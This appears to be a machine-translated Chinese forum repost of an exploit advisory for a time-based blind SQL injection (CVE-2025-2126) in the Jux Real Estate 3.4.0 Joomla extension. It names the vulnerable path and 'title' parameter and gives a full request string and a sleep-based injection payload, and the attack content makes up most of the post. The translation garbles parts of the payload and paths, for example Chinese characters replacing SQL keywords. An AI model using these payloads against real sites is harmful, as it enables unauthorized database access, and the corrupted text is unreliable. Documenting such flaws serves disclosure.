H

Jux房地产3.4.0 -SQL注入

HackApt-37 Team已验证会员

黑客倉庫站長

贡献: 83%
#利用标题: Jux Real Estate 3.4.0- SQL注入
#利用作者:饼干
#日期: 26/02/2025
#vendor: Joomlaux
#供应商HomePage3360 https://joomlaux.com/
#软件link: https://extensions.joomla.org/extension/jux-real-estate/
#demo link: http://demo.joomlaux.com/#jux-real-estate
#在: Windows 11 Pro测试
#Impact:数据库访问
#CWE: CWE-89-CWE-74-CWE-707
#CVE: CVE-2025-2126
#VDB: VDB-299039
## 描述
SQL注入攻击可以允许未经授权访问敏感数据,修改
数据并崩溃应用程序或使其无法使用,导致收入损失,并且
损害公司声誉。
path3360/extensions/realestate/index.php/properties/list/list-with-sidebar/realties
获取参数“标题”很容易受到SQLI的影响
---
参数:标题(GET)
Type:基于时间的盲人
title: mysql=5.0.12基于时间的盲人(查询睡眠)
PAYLOAD:选项=com_jux_real_estateview=realtiesItemid=148title='xor(select(select(0)from(select(sleep(6)))))xor'zprice_slider_lower_lower=63752price_slider_upper=400000AREA_SLIDER_LOWER=30AREA_SLIDER_UPPER=400TYPE_ID=2CAT_ID=8COUNTRY_ID=73locState=187 beds=1agent_id=1agent_id=112baths=1JP_YearBuilt=1JP_YEARBUILT=button=button=button=search
## POC:
## PAYLOAD:
1'xor(select(0)从(select(sleep(6)))a)xor'z
[-] 完毕
 
后退
顶部